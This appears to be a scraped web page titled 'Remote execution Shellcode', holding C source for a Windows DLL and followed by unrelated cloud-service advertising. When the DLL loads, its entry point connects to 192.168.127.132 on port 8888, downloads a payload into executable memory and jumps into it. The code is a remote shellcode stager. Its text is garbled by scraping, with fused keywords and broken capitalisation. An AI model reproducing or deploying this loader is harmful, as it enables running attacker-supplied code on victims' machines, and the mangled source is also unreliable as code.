#include"Windows.h"#include<WinSock2.h>#include<stdio.h>#pragmaComment (lib, "Ws2_32.lib")intShellcode_execute () {wsadata wsdata; if(WSAStartup (Makeword (2,2),&wsdata)) {printf ("WSASTARTP fail.\n"); return 0; } SOCKET sock= WSASocket (Af_inet,sock_stream,0,0,0,0); sockaddr_in server; ZeroMemory (&server,sizeof(sockaddr_in)); Server.sin_family=af_inet; Server.sin_addr.s_addr= Inet_addr ("192.168.127.132");//Server IPServer.sin_port = htons (8888);//Server Port if(Socket_error = = Connect (sock, (sockaddr*) &server,sizeof(server))) {printf ("Connect to server fail.\n"); Closesocket (sock); WSACleanup (); return 0; } U_int Payloadlen; if(Recv (Sock, (Char*) &payloadlen,sizeof(Payloadlen),0) !=sizeof(Payloadlen)) {printf ("recv error\n"); Closesocket (sock); WSACleanup (); return 0; } Char* Orig_buffer = (Char*) VirtualAlloc (null,payloadlen,mem_commit,page_execute_readwrite); Char* Buffer =Orig_buffer; intRET =0; Do{ret= Recv (Sock,buffer,payloadlen,0); Buffer+=ret; Payloadlen-=ret; } while(Ret >0&& Payloadlen >0); Execute shellcode __asm {mov edi,sock; JMP Orig_buffer; } virtualfree (Orig_buffer,0, mem_release); } BOOL apientry DllMain (hmodule hmodule, DWORD Ul_reason_for_call, LPVOID l Preserved) {Switch(ul_reason_for_call) { Casedll_process_attach: shellcode_execute(); CaseDll_thread_attach: CaseDll_thread_detach: CaseDll_process_detach: Break; } returnTRUE;}
Remote execution Shellcode
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
